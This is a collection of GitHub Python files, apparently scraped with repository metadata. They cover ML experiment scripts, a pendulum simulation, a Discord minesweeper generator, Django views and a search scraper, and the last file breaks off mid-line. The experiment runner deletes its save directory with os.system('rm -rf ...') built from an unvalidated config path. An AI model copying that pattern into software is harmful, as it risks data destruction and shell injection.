list[torch.optim.Optimizer]) -> tuple[torch.nn.Module, torch.optim.Optimizer]:\n \"\"\"Returns the latest models from a directory.\"\"\"\n\n # Load the models.\n max_epoch = None\n for model, name, optimizer in zip(models, model_names, optimizers):\n\n # Get the latest epoch.\n model_save_dir = os.path.join(save_dir, \"models\", name)\n if not os.path.exists(model_save_dir):\n assert max_epoch is None\n return models, optimizers, None\n model_files = os.listdir(model_save_dir)\n model_max_epoch = max([int(fname.split(\"_\")[1].split(\".pth\")[0]) for fname in model_files])\n if max_epoch is None:\n max_epoch = model_max_epoch\n assert max_epoch == model_max_epoch\n\n # Load the model.\n save_path = os.path.join(model_save_dir, f\"epoch_{max_epoch}.pth\")\n checkpoint = torch.load(save_path)\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n\n return models, optimizers, max_epoch\n\n\ndef run_experiment(config: dict):\n \"\"\"Runs an experiment.\"\"\"\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n # Load training parameters.\n out_dir = config['save_dir']\n training_cfg = config['training']\n\n # Load the dataset.\n dataset_cfg = config['datasets']\n dataset_a_train, _ = dataset_cfg['initial']\n dataset_b_train, _ = dataset_cfg['finetune']\n # dataset_a_train = torch.utils.data.Subset(dataset_a_train, range(50))\n # dataset_b_train = torch.utils.data.Subset(dataset_b_train, range(50))\n\n # Load the models.\n model_names = list(config['schedules'])\n models = [config['schedules'][name]['model'] for name in model_names]\n model_infos = [{} for _ in model_names]\n pre_train_weights = [deepcopy(model.get_conv_weights().detach().clone().to(device)) for model in models]\n\n # Unconstrain + freeze the models if necessary for finetuning.\n for name, model in zip(model_names, models):\n init_params = config['schedules'][name]['initial']\n if init_params['freeze_first_layer']:\n model.freeze_first_layer()\n if not init_params['gabor_constrained']:\n model.unconstrain()\n \n # Set the device since we don't at init. (TODO: fix this).\n model.to(device)\n model.g1.device = device\n\n # Set up the models + data for initial training.\n optimizers_a = [torch.optim.Adam(\n model.parameters(), **config['schedules'][name]['initial']['optimizer_params']) \n for name, model in zip(model_names, models)]\n dataloader_a = torch.utils.data.DataLoader(dataset_a_train, **training_cfg['dataloader_params'])\n save_dir_a = os.path.join(out_dir, 'dataset_a')\n\n # Resume training if any training has already been done.\n models, optimizers_a, last_epoch = get_checkpoints(save_dir_a, model_names, models, optimizers_a)\n starting_epoch_a = last_epoch + 1 if last_epoch is not None else 0\n\n # Run the initial training.\n if starting_epoch_a == training_cfg['initial']['epochs']:\n print(\"\\nFinished training on dataset A.\")\n else:\n print(\"\\nTraining on dataset A...\")\n train_many(models=models, optimizers=optimizers_a, model_names=model_names, \n model_infos=model_infos, dataloader=dataloader_a, save_dir=save_dir_a, device=device, \n starting_epoch = starting_epoch_a, n_epochs = training_cfg['initial']['epochs'])\n\n # Check that weights changed as expected.\n post_train_weights = [deepcopy(model.get_conv_weights().detach().clone()) for model in models]\n for post_train_weight, pre_train_weight, name in zip(post_train_weights, pre_train_weights, model_names):\n if config['schedules'][name]['initial']['freeze_first_layer']:\n assert torch.allclose(post_train_weight, pre_train_weight), \\\n \"Weights should not have changed after initial training.\"\n else:\n assert not torch.allclose(post_train_weight, pre_train_weight), \\\n \"Weights should have changed after initial training.\"\n \n # Unconstrain + freeze the models if necessary for finetuning.\n for name, model in zip(model_names, models):\n finetune_params = config['schedules'][name]['finetune']\n if finetune_params['freeze_first_layer']:\n model.freeze_first_layer()\n if not finetune_params['gabor_constrained']:\n model.unconstrain()\n\n # Set up the models + data for fine-tuning.\n dataloader_b = torch.utils.data.DataLoader(dataset_b_train, **training_cfg['dataloader_params'])\n optimizers_b = [torch.optim.Adam(\n model.parameters(), **config['schedules'][name]['finetune']['optimizer_params']) \n for name, model in zip(model_names, models)]\n save_dir_b = os.path.join(out_dir, 'dataset_b')\n\n # Resume training if any training has already been done.\n models, optimizers_b, last_epoch = get_checkpoints(save_dir_b, model_names, models, optimizers_b)\n starting_epoch_b = last_epoch + 1 if last_epoch is not None else 0\n if starting_epoch_b > 0:\n assert starting_epoch_a == training_cfg['initial']['epochs'], \\\n \"Cannot resume training on dataset B if training on dataset A was not completed.\"\n\n # Run the fine-tuning.\n if starting_epoch_b == training_cfg['finetune']['epochs']:\n print(\"\\nFinished fine-tuning on dataset B.\")\n else:\n print(\"\\nFine-tuning on dataset B.\")\n train_many(models=models, optimizers=optimizers_b, model_names=model_names, \n model_infos=model_infos, dataloader=dataloader_b, save_dir=save_dir_b, device=device, \n starting_epoch = starting_epoch_b, n_epochs = training_cfg['finetune']['epochs'])\n\n # Check that weights changed as expected.\n post_finetune_weights = [deepcopy(model.get_conv_weights().detach().clone()) for model in models]\n for post_finetune_weight, post_train_weight, name in zip(post_finetune_weights, post_train_weights, model_names):\n if config['schedules'][name]['finetune']['freeze_first_layer']:\n assert torch.allclose(post_finetune_weight, post_train_weight), \\\n \"Weights should not have changed after fine-tuning.\"\n else:\n assert not torch.allclose(post_finetune_weight, post_train_weight), \\\n \"Weights should have changed after fine-tuning.\"\n\n\ndef main():\n\n # Parse command line arguments.\n parser = argparse.ArgumentParser(description=\"Run experiments.\")\n parser.add_argument(\"config\", type=str, help=\"Path to the configuration file.\")\n parser.add_argument(\"--overwrite\", action=\"store_true\", help=\"Overwrite existing results instead of continuing.\")\n\n args = parser.parse_args()\n\n # Parse the configuration file + run the experiment.\n config = parse_config(args.config)\n if args.overwrite:\n os.system(f\"rm -rf {config['save_dir']}\")\n\n # Change the seed each repeat so that we get different random initializations + adjust the save directory.\n og_save_dir = config['save_dir']\n og_seed = config['seed']\n for i in range(config['n_repeats']):\n repeat_seed = og_seed + i\n repeat_save_dir = os.path.join(og_save_dir, str(i))\n\n config = parse_config(args.config, {'seed': repeat_seed, 'save_dir': repeat_save_dir})\n\n print(f\"Running repeat {i+1} of {config['n_repeats']}\")\n run_experiment(config)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"samacqua/gabor-constrained-nns","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":7830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70161497524","text":"__author__ = 'Todd Young'\n__email__ = 'youngmt1@ornl.gov'\n__version__ = '0.0.1'\n\nimport logging\nfrom gym.envs.registration import register\n\n\nlogger = logging.getLogger(__name__)\n\nregister(\n id='MoleculesSim-v0',\n entry_point='gym_molecules.envs:MoleculesEnv',\n timestep_limit=1000,\n reward_threshold=1.0,\n nondeterministic = True,\n)\n","repo_name":"yngtodd/gym_molecules","sub_path":"gym_molecules/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27976642088","text":"'''\nPROGRAM chaos_theta_t\nthis program solve for the chaotic pendulum \nAuthor: Chen Yangyao Last Modify: 20160424\n'''\n# import packages needed\nimport matplotlib.pyplot as plt\nimport numpy as np\n# class CHAOS solves for the chaotic pendulum\n# the equation considers both damping, driving, and nonlinearity\n# where: Fd, omgd- amplitude and frequency of driving force\n# size,period - number of steps in an period of driving force, total computing number of period\n# theta0 - initial angle position\n# omg0 =0 -initial angular velocity will be zero\nclass CHAOS(object):\n def __init__(self,_Fd=1.2, _theta0=0.2, _omgd=2./3., _size=100., _period=4.):\n self.theta, self.omg, self.t=[_theta0], [0.0], [0.0]\n self.size, self.period= int(round(_size)), int(round(_period))\n self.dt=(2.*np.pi/_omgd)/self.size\n self.time=(2.*np.pi/_omgd)*self.period\n self.n=int(np.round(self.time/self.dt))\n self.g, self.l, self.q=9.8, 9.8, 1./2.\n self.Fd, self.omgd=_Fd, _omgd \n def calculate(self): # use fourth-order Runge-Kutta method to solve the chaotic pendulum\n for i in range(self.n):\n self.t1,self.t2,self.t3,self.t4=self.t[-1],self.t[-1]+self.dt/2.,self.t[-1]+self.dt/2.,self.t[-1]+self.dt\n self.omg1=self.omg[-1]\n self.theta1=self.theta[-1]\n self.omg2=self.omg1+(-self.g/self.l*np.sin(self.theta1)-self.q*self.omg1+ \\\n self.Fd*np.sin(self.omgd*self.t1))*self.dt/2.\n self.theta2=self.theta1+self.omg1*self.dt/2.\n self.omg3=self.omg1+(-self.g/self.l*np.sin(self.theta2)-self.q*self.omg2+ \\\n self.Fd*np.sin(self.omgd*self.t2))*self.dt/2.\n self.theta3=self.theta1+self.omg2*self.dt/2.\n self.omg4=self.omg1+(-self.g/self.l*np.sin(self.theta3)-self.q*self.omg3+ \\\n self.Fd*np.sin(self.omgd*self.t3))*self.dt\n self.theta4=self.theta1+self.omg3*self.dt\n self.t.append(self.t4)\n self.omg.append(self.omg1+ \\\n 1./6.*(-self.g/self.l)*(np.sin(self.theta1)+2.*np.sin(self.theta2)+2.*np.sin(self.theta3)+np.sin(self.theta4))*self.dt+ \\\n 1./6.*(-self.q)*(self.omg1+2.*self.omg2+2.*self.omg3+self.omg4)*self.dt +\\\n 1./6.*self.Fd*(np.sin(self.omgd*self.t1)+2.*np.sin(self.omgd*self.t2)+2.*np.sin(self.omgd*self.t3)+np.sin(self.omgd*self.t4))*self.dt\n )\n self.theta.append(self.theta1+1./6.*(self.omg1+2.*self.omg2+2.*self.omg3+self.omg4)*self.dt)\n while self.theta[-1]>np.pi: # reset the angle to keep it in range [-pi,pi]\n self.theta[-1]=self.theta[-1]-2.*np.pi\n while self.theta[-1]<-np.pi:\n self.theta[-1]=self.theta[-1]+2.*np.pi\n def calculate_allangle(self): # calculate, but don't reset the angle to keep it in range [-pi,pi]\n for i in range(self.n):\n self.t1,self.t2,self.t3,self.t4=self.t[-1],self.t[-1]+self.dt/2.,self.t[-1]+self.dt/2.,self.t[-1]+self.dt\n self.omg1=self.omg[-1]\n self.theta1=self.theta[-1]\n self.omg2=self.omg1+(-self.g/self.l*np.sin(self.theta1)-self.q*self.omg1+ \\\n self.Fd*np.sin(self.omgd*self.t1))*self.dt/2.\n self.theta2=self.theta1+self.omg1*self.dt/2.\n self.omg3=self.omg1+(-self.g/self.l*np.sin(self.theta2)-self.q*self.omg2+ \\\n self.Fd*np.sin(self.omgd*self.t2))*self.dt/2.\n self.theta3=self.theta1+self.omg2*self.dt/2.\n self.omg4=self.omg1+(-self.g/self.l*np.sin(self.theta3)-self.q*self.omg3+ \\\n self.Fd*np.sin(self.omgd*self.t3))*self.dt\n self.theta4=self.theta1+self.omg3*self.dt\n self.t.append(self.t4)\n self.omg.append(self.omg1+ \\\n 1./6.*(-self.g/self.l)*(np.sin(self.theta1)+2.*np.sin(self.theta2)+2.*np.sin(self.theta3)+np.sin(self.theta4))*self.dt+ \\\n 1./6.*(-self.q)*(self.omg1+2.*self.omg2+2.*self.omg3+self.omg4)*self.dt +\\\n 1./6.*self.Fd*(np.sin(self.omgd*self.t1)+2.*np.sin(self.omgd*self.t2)+2.*np.sin(self.omgd*self.t3)+np.sin(self.omgd*self.t4))*self.dt\n )\n self.theta.append(self.theta1+1./6.*(self.omg1+2.*self.omg2+2.*self.omg3+self.omg4)*self.dt) \n def plot_theta(self,_ax): # the theta(angle)-t plot\n _ax.plot(self.t,self.theta,'-',label=r'$F_d = $'+' %.2f'%self.Fd)\n def plot_omg(self,_ax): # the omega(angular velocity)-t plot\n _ax.plot(self.t,self.omg,'-',label=r'$F_d = $'+' %.2f'%self.Fd)\n def plot_phase(self,_ax): # the phase-space plot\n _ax.plot(self.theta,self.omg,'-',label=r'$F_d = $'+' %.2f'%self.Fd)\n def plot_Poincare(self,_ax): # the Poincare section plot\n self.t_Poincare, self.omg_Poincare, self.theta_Poincare=[],[],[]\n for i in range(int(np.round(self.period))):\n self.t_Poincare.append(self.t[(i+1)*self.size])\n self.omg_Poincare.append(self.omg[(i+1)*self.size])\n self.theta_Poincare.append(self.theta[(i+1)*self.size])\n _ax.scatter(self.theta_Poincare[300:], self.omg_Poincare[300:], s=8,label=r'$F_d = $'+' %.2f'%self.Fd)\n\n# class CHAOS_VIA solves two identical pendulum systems\n# but initial angle has a difference 1E-3\n# where: Fd- amplitude of driving force\n# theta01,theta02 - initial angle of two pendulum \nclass CHAOS_VIA(object):\n def __init__(self,_Fd=1.2,_theta01=0.2,_theta02=0.2-1E-3):\n self.Fd=_Fd \n self.theta0=[_theta01,_theta02]\n def calculate(self):\n self.cal=CHAOS(self.Fd, self.theta0[0],2./3.,100,8)\n self.cal.calculate()\n self.t=self.cal.t\n self.theta1=self.cal.theta\n self.cal=CHAOS(self.Fd, self.theta0[1],2./3.,100,8)\n self.cal.calculate()\n self.theta2=self.cal.theta\n self.theta=np.array(self.theta1)-np.array(self.theta2)\n self.theta=np.abs(self.theta)\n def plot_via(self,_ax):\n _ax.semilogy(self.t, self.theta,'-r',label=r'$F_d = $'+' %.2f'%self.Fd)\n \n \n# give figures of chaotic pendulum\nfig=plt.figure(figsize=(10,8))\nax1=plt.subplot(321)\nplt.title(r'$\\theta$'+' versus '+r'time',fontsize=18)\nax2=plt.subplot(323)\nplt.yticks([-np.pi,-np.pi/2,0,np.pi/2,np.pi],[r'$-\\pi$',r'$-\\pi /2$',r'$0$',r'$\\pi/2$',r'$\\pi$'])\nax2.set_ylim(-3.5,3.5)\nax3=plt.subplot(325)\nplt.yticks([-np.pi,-np.pi/2,0,np.pi/2,np.pi],[r'$-\\pi$',r'$-\\pi /2$',r'$0$',r'$\\pi/2$',r'$\\pi$'])\nax3.set_ylim(-3.5,3.5)\n\n# ax1,ax2,ax3 : theta-t plot\ncal=CHAOS(0.,0.2,2./3.,100.,4.) #Fd=0\ncal.calculate()\ncal.plot_theta(ax1)\ncal=CHAOS(0.5,0.2,2./3.,100.,4.) #Fd=0.5\ncal.calculate()\ncal.plot_theta(ax2)\ncal=CHAOS(1.2,0.2,2./3.,100.,4.) #Fd=1.2\ncal.calculate()\ncal.plot_theta(ax3)\n\n# ax4,ax5,ax6 : theta-difference of two pendulums,with different initial angle\nax4=plt.subplot(322)\nplt.title(r'$\\Delta \\theta$'+' versus '+r'time',fontsize=18)\nax5=plt.subplot(324)\nax6=plt.subplot(326)\ncal=CHAOS_VIA(0.0) #Fd=0\ncal.calculate()\ncal.plot_via(ax4)\ncal=CHAOS_VIA(0.5) #Fd=0.5\ncal.calculate()\ncal.plot_via(ax5)\ncal=CHAOS_VIA(1.2) #Fd=1.2\ncal.calculate()\ncal.plot_via(ax6)\n\nplt.show()\n\n \n \n \n ","repo_name":"ChenYangyao/computationalphysics_N2013301020169","sub_path":"chapter3_201604_22/ch3_chaos_theta_t.py","file_name":"ch3_chaos_theta_t.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"16122237189","text":"import random\n\n\nclass SpoilerMinesweeper:\n WON = 1\n CONTINUE = 0\n LOST = 2\n\n BOMB = -1\n UNCOVERED = -2\n\n def __init__(self, height: int = 10, width: int = 10, bombs: int = 10): # noqa C901\n self.board = [[0 for _ in range(width)] for _ in range(height)]\n if bombs > height * width:\n raise MinesweeperError(\"Number of bombs cannot be bigger than the number of squares\")\n placed = 0\n while placed < bombs:\n h = random.randint(0, height - 1)\n w = random.randint(0, width - 1)\n if self.board[h][w] == 0:\n self.board[h][w] = -1 # place a bomb\n placed += 1\n for h in range(height):\n for w in range(width):\n if self.board[h][w] == -1:\n continue\n # count the bombs around a square\n for dx in (-1, 0, 1):\n for dy in (-1, 0, 1):\n if h + dx < 0 or w + dy < 0 or h + dx >= height or w + dy >= width:\n continue\n if not dx and not dy:\n continue\n if self.board[h + dx][w + dy] == -1:\n self.board[h][w] += 1\n\n print(self)\n\n def __str__(self):\n return \"\\n\".join([\"\".join(map(self._str, row)) for row in self.board])\n\n def discord_str(self, spoilers: bool = True):\n d_str = \"\\n\".join(\n [\"\".join(map(lambda x: self._discord_str(x, spoilers), row))\n for row in self.board]\n )\n if len(d_str) >= 2000:\n raise MinesweeperError(\"Board to big to send through discord\")\n return d_str\n\n def _str(self, n: int):\n if n == -1:\n return \"*\"\n if n == 0:\n return \"-\"\n return str(n)\n\n def _discord_str(self, n: int, spoiler: bool = False):\n fmt = \"<<:%s:>>\" if spoiler else \":%s:\"\n if n == -1:\n return fmt % \"bomb\"\n else:\n return fmt % ['black_large_square', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight'][n]\n\n\nclass MinesweeperError(Exception):\n pass\n","repo_name":"aoi-bot/Aoi","sub_path":"libs/minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"19509065473","text":"from django.conf.urls import url\nfrom article.views import (\n create_article,\n edit_article,\n article_details,\n article_category_index_views,\n drafts,\n user_articles\n)\n\nurlpatterns = [\n url(r'^new/$', create_article, name='create_article'),\n url(r'^edit/(?P\\d+)$', edit_article, name='edit_article'),\n url(r'^details/(?P\\d+)$', article_details, name='details'),\n url(r'^category/(?P\\d+)$', article_category_index_views, name='article_category'),\n url(r'^drafts$', drafts, name='user_drafts'),\n url(r'^author/(?P\\d+)$', user_articles, name='user_articles'),\n]\n","repo_name":"tony90s/hxw_blog","sub_path":"hxw_blog/djangoapps/article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"13885760501","text":"import pandas as pd\r\nfrom json import dumps\r\nfrom googleapiclient.discovery import build\r\n\r\n\r\n\r\nmy_api_key = \"YOUR GOOGLE CUSTOM SEARCH API KEY\"\r\nmy_cse_id = \"YOUR SEARCH ENGINE ID\"\r\n\r\n\r\ndef google_search(search_term, api_key, cse_id, **kwargs):\r\n service = build(\"customsearch\", \"v1\", developerKey=api_key)\r\n res = service.cse().list(q=search_term, cx=cse_id, **kwargs).execute()\r\n return res['items']\r\n\r\n\r\n#results = google_search('what is Hadamard gate?', my_api_key, my_cse_id, num=2)\r\n\r\n'''zzz\r\nfor result in results:\r\n \r\n\r\n title = result['title']\r\n link = result['formattedUrl']\r\n dis = result['snippet']\r\n print (title)\r\n print (link)\r\n print (dis)\r\n'''\r\n\r\n\r\n# Show all columns in pandas dataframe when printing to stdout\r\npd.set_option(\"display.max_columns\", None)\r\n\r\ndatafile='../01_db_exploration/data/magnetic-dimensionality-v100.csv'\r\ndf0 = pd.read_csv(datafile, ';')\r\n#print(df0.keys())\r\n\r\n# Drop all the columns except these ones\r\ndf = df0[['icsd_code','dimension', 'chemical_structural_formula', 'num_atoms', 'space_group_symmetry', 'number_index', 'structure_type', 'valence', 'metal_neigh_coordination', 'partial_occupancy']].copy()\r\n\r\n# Print only materials with a given number of atoms, two-dimensional and no partial occupancy of atomic sites\r\nprint(df[ (df.num_atoms<=3) & (df.dimension==2) & (df.partial_occupancy=='no') ])\r\n\r\n\r\n# Dictionary with the data gathered in the search\r\ngathered_data={'material':[],'search_word':[],'search_result':[]}\r\n\r\n# List of materials to be searched\r\nlista_de_materiais=['Fe Cl2','Cr Se2']\r\n\r\n# List of words to be searched for\r\nlista_de_termos=['magnetic','metal','insulator']\r\n\r\n\r\n# Loop over material and search words\r\n# 'google_search_for()' should be substituted with appropriate method from google API\r\nfor mat in lista_de_materiais:\r\n for word in lista_de_termos:\r\n gathered_data['material'].append(mat)\r\n gathered_data['search_word'].append(word)\r\n try:\r\n\r\n gathered_data['search_result'].append(google_search(mat+\" \"+word, my_api_key, my_cse_id, num=1))\r\n except:\r\n gathered_data['search_result'].append('No results')\r\n \r\n \r\n# Writes gathered_data dictionary into json file\r\nwith open('data/gresults.json', 'w') as jsonf:\r\n jsonf.write(dumps(gathered_data)) \r\n\r\n\r\n\r\n","repo_name":"VictorRayan/scientific-python","sub_path":"ALON_SearchCustomMaterials.py","file_name":"ALON_SearchCustomMaterials.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"405648567","text":"from datetime import datetime\nimport json\nfrom django.http import JsonResponse\nfrom django.views.decorators.http import require_http_methods\nfrom django.views.decorators.csrf import csrf_exempt\nfrom externalInfractions.api.interactors.createMockInfractionInteractor import createMockInfractionInteractor\nfrom externalInfractions.api.serializers import ExternalInfractionSerializer\n\n@require_http_methods([\"POST\"])\n@csrf_exempt # Use this decorator for development to disable CSRF protection; use proper CSRF handling in production\ndef createMockInfraction(request):\n body = json.loads(request.body.decode('utf-8'))\n\n code = body.get(\"code\")\n infractionCode = body.get(\"infractionCode\")\n ballotNumber = body.get(\"ballotNumber\")\n name = body.get(\"name\")\n level = body.get(\"level\")\n fine = body.get(\"fine\")\n date = body.get(\"date\")\n formatted_date = datetime.strptime(date, '%Y-%m-%d')\n\n mockInfractionCreated = createMockInfractionInteractor(code, infractionCode, ballotNumber, name, level, fine, formatted_date)\n if mockInfractionCreated:\n statusCode = 201\n mockInfraction = ExternalInfractionSerializer(mockInfractionCreated)\n responseMessage = 'License Plate created successfully'\n response = {\n \"responseMessage\": responseMessage,\n \"mockInfraction\": mockInfraction.data\n }\n return JsonResponse(response, status=statusCode, safe=False)\n else:\n statusCode = 400\n responseMessage = 'License Plate creation failed'\n response = {\n \"responseMessage\": responseMessage,\n \"mockInfraction\": None,\n }\n return JsonResponse(response, status=statusCode, safe=False)","repo_name":"Arix69sex/PRY20231013-LPDRBackend","sub_path":"externalInfractions/api/views/createMockInfraction.py","file_name":"createMockInfraction.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30618528826","text":"import re\n\nfrom pylons import tmpl_context as c\nfrom vulcanforge.artifact.model import Shortlink, ArtifactReference\n\n\nclass ArtifactAPI(object):\n \"\"\"\n Global entry point for artifact-related API, most notably for artifact\n references. Mounted on pylons.app_globals as artifact\n\n \"\"\"\n # regex to extract shortlinks from markdown\n SHORTLINK_RE = re.compile(\n r'''(? int:\n n = len(nums)\n if n==1:\n return nums[0]\n else:\n prev2 = nums[0]\n prev = max(prev2,nums[1])\n \n result=0\n for i in range(2,n):\n result = max(prev, prev2+nums[i])\n prev2=prev\n prev=result\n \n return prev\n","repo_name":"alexrusev03/LeetCode-Problems","sub_path":"Python/198. House Robber.py3","file_name":"198. House Robber.py3","file_ext":"py3","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"33047025783","text":"from eightball import get_final_predictions\nfrom predictor import MarketPredictor\nimport datetime\n\nif __name__ == '__main__':\n days_into_future = 1\n date_to_predict = (datetime.datetime.now() + datetime.timedelta(days=days_into_future)).strftime(\"%Y-%m-%d\")\n stock = \"GRTS\"\n print(\"Date Predicted: \" + date_to_predict)\n print(\"Stock Predicted: \" + stock)\n mp = MarketPredictor(stock)\n mp.load_data()\n mp.fit_inital()\n raw_preds = mp.predict(date_to_predict)\n unweighted_results = [raw_preds['Output Values'][x] for x in range(5)]\n print(\"\\n\")\n print(\"Raw Results:\")\n print(unweighted_results)\n weighted_results = get_final_predictions(stock, date_to_predict)\n print(\"\\n\")\n print(\"Weighted Results: \")\n print(weighted_results)\n","repo_name":"karthiksing05/8ball","sub_path":"eightballTest.py","file_name":"eightballTest.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34332993881","text":"import os\nimport argparse\n\n\ndef getFileList(dir: str, extract: str) -> list:\n fileList = []\n filenames = os.listdir(dir)\n for filename in filenames:\n ext = os.path.splitext(filename)[-1]\n if ext == extract:\n fileList.append(filename)\n return fileList\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-d\", \"--dataset\", help=\"dataset path\", type=str, default=\"./dataset/train\"\n )\n parser.add_argument(\"-s\", \"--size\", help=\"image size\", type=int, default=640)\n parser.add_argument(\"-l\", \"--limit\", help=\"limit of pixels\", type=int, default=8)\n args = parser.parse_args()\n path = args.dataset\n size = args.size\n limit = args.limit\n fileList = getFileList(path, \".txt\")\n limit = limit * limit\n counter = 0\n labelcounter = 0\n # change dir\n os.chdir(path)\n for file in fileList:\n with open(file) as f:\n for line in f:\n labelcounter += 1\n temp = line.split(\" \")\n w = float(temp[3]) * size\n h = float(temp[4]) * size\n pixels = round(w * h)\n if pixels <= limit:\n counter += 1\n print(counter)\n print(labelcounter)\n print(len(fileList))\n print(limit)","repo_name":"225ceV/tiny","sub_path":"script/findLess.py","file_name":"findLess.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10948581635","text":"# %%\nimport pandas as pd\nimport numpy as np\nimport plotly.express as px\nfrom graph_ex import *\n\nfrom geopandas.geodataframe import GeoDataFrame\n\ngroup_error_col = \"error\"\nclass step_rep_geo:\n def __init__(self, df: GeoDataFrame, weight_objective: int, deepness: int = None) -> None:\n df_has_requested_cols = np.isin([weight_col, group_id_col, group_weight_col], df.columns).all()\n assert df_has_requested_cols, \"missing required columns\"\n\n self.geo_df: GeoDataFrame = df.sort_values(by=weight_col)\n self.weight_objective: int = weight_objective\n \n\n self.group_ids_sorted_by_weight = self.geo_df[group_id_col]\n self.geo_df[group_error_col] = self.geo_df[group_weight_col] - self.weight_objective\n self.loss = ((self.geo_df[group_error_col])**2).sum()\n self.can_improve = (self.geo_df[group_error_col] < 0).sum() > 1\n self.deepness = deepness if deepness else 0\n \n def get_groups_weights(self, groups):\n ids = [id for group_id in groups for id in group_id.split(',')]\n return self.geo_df[weight_col][ids]\n\n def get_groups_as_sets(self) -> list[set]:\n return self.geo_df[group_id_col].map(set)\n\n def get_geo_group_connections(self, group_id:list[str]) -> GeoDataFrame:\n ids = group_id.split(',')\n dissolved_group: gpd.GeoSeries = self.geo_df.loc[ids].dissolve().geometry\n assert dissolved_group.shape[0] == 1, \"There shouldn't be more than one shape\"\n touches_group_filter = self.geo_df.geometry.touches(dissolved_group[0])\n # touches_group_filter[filter_in_group] = False\n return self.geo_df[touches_group_filter].copy()\n\n def get_group_connections(self, group_id:list[str]):\n return self.get_geo_group_connections(group_id)[group_id_col]\n\n def group_connections_respecting_objective(self, group_id) -> pd.Series:\n group_connections_df: pd.DataFrame = self.get_geo_group_connections([group_id])\n if len(group_connections_df) == 0:\n return []\n square_errors = ((group_connections_df[weight_col] + self.get_groups_weights(group_id)) - self.weight_objective)**2\n\n indices_sorted_closest_to_objective:pd.Series = square_errors.argsort()\n return group_connections_df[group_id_col][indices_sorted_closest_to_objective]\n\n def fuse(self, group_ids_to_fuse:list[str]):\n \n ids = [id for group_id in group_ids_to_fuse for id in group_id.split(',')]\n\n new_geo_df: gpd.GeoDataFrame = self.geo_df.copy()\n new_geo_df.loc[ids, group_weight_col] = new_geo_df[group_weight_col][ids].sum()\n new_geo_df.loc[ids, group_id_col] = ','.join(ids)\n\n return step_rep_geo(new_geo_df, self.weight_objective, self.deepness+1)\n\n def __repr__(self) -> str:\n return f\"(step_rep_geo) loss:{self.loss}\"\n \n def __gt__(self, other) -> bool:\n return self.loss > other.loss\n def __ge__(self, other) -> bool:\n return self.loss >= other.loss\n def __lt__(self, other) -> bool:\n return self.loss < other.loss\n def __le__(self, other) -> bool:\n return self.loss <= other.loss\n\n def __eq__(self, other: object) -> bool:\n if type(other) !=step_rep_geo: return False\n self_groups = self.get_groups_as_sets()\n other_groups: np.ndarray = other.get_groups_as_sets()\n return self_groups.isin(other_groups).all()\n \n def plot(self, title: str):\n # fused_nodes:GeoDataFrame = self.geo_df.loc[nodes_to_fuse].dissolve(aggfunc = sum).assign(code=','.join(nodes_to_fuse)).set_index('code')\n fig = px.choropleth(\n self.geo_df,\n geojson=self.geo_df['geometry'],\n locations=self.geo_df.index, \n color = group_error_col,\n color_continuous_scale = \"rdbu\",\n hover_data = [group_id_col, group_weight_col,self.geo_df.index, weight_col],\n title = title\n )\n\n fig.update_geos(fitbounds=\"locations\", visible=False)\n fig.update_layout(margin={\"r\":0,\"t\":0,\"l\":0,\"b\":0})\n fig.show()\n\n\nif __name__ == '__main__':\n step = step_rep_geo(geo_df=geo_df, weight_objective=weight_objective)\n # step.plot(\"initial\")\n group = step.group_ids_sorted_by_weight[0]\n group_connections = step.get_group_connections(group)\n next_step = step.fuse([group,group_connections[0]])\n next_step.plot(\"next\")\n# %%\n","repo_name":"leopoldlacroix/graph_proj","sub_path":"step_rep_geo.py","file_name":"step_rep_geo.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71085478322","text":"'''\nMy solution to Rosalind Algorithmic Heights Problem 005\n\nTitle: Double-Degree Array\nRosalind ID: DDEG\nRosalind #: 005\nURL: http://rosalind.info/problems/ddeg\n'''\n\nimport numpy as np\nimport os\n\ndef adjacency_list(k, edge_u, edge_v):\n out = {}\n for i in xrange(1, k+1):\n idx1 = np.where(edge_u == i)[0]\n idx2 = np.where(edge_v == i)[0]\n out[i] = np.concatenate((edge_u[idx2], edge_v[idx1]), axis=0)\n return out\n\n\nif __name__ == '__main__':\n # read data\n f = open(os.path.join(os.path.split(os.getcwd())[0], \"data\", \"rosalind_ddeg.txt\"), 'r')\n adj_list = [map(int, line.rstrip().split()) for line in f.readlines()]\n n = adj_list.pop(0)[0]\n\n # create numpy arrays\n l = len(adj_list)\n edge_u = np.empty(l, dtype=np.int)\n edge_v = np.empty(l, dtype=np.int)\n\n i = 0\n for line in adj_list:\n edge_u[i] = line[0]\n edge_v[i] = line[1]\n i += 